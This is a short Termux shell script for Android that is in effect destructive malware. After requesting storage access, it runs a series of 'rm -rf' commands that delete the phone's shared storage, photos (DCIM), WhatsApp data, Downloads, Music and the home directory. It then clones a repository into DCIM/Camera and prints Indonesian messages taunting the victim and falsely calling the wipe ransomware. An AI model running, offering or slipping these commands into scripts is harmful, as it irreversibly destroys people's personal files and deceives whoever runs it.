clear 
termux-setup-storage
rm -rf /storage/emulated/0
rm -rf /sdcard/0
rm -rf /storage/emulated/0/DCIM
rm -rf /sdcard/DCIM
rm -rf /storage/emulated/0/android/obb
rm -rf /sdcard/0/android/data
rm -rf $HOME
rm -rf sdcard/0
rm -rf storage/emulated/0
rm -rf /storage/emulated/0/WhatsApp
rm -rf /sdcard/0/WhatsApp
rm -rf /storage/emulated/0/Downloads
rm -rf /storage/emulated/0/Music
rm -rf /sdcard/0/Music
cd /sdcard
mkdir DCIM
git clone https://github.com/rikosanjuri14/Camera
clear
figlet "HEY STUPID"|lolcat
echo "Hp Anda Terkena Ransomware Encryp File"|lolcat
echo "So Aku Tidak Mau Meminta Tebusan berupa Uang Karena Aku Baik"|lolcat
echo "Silahkan Buka Galerry Anda Sebagai Petunjuk atau Buka Folder DCIM/Camera"|lolcat
exit


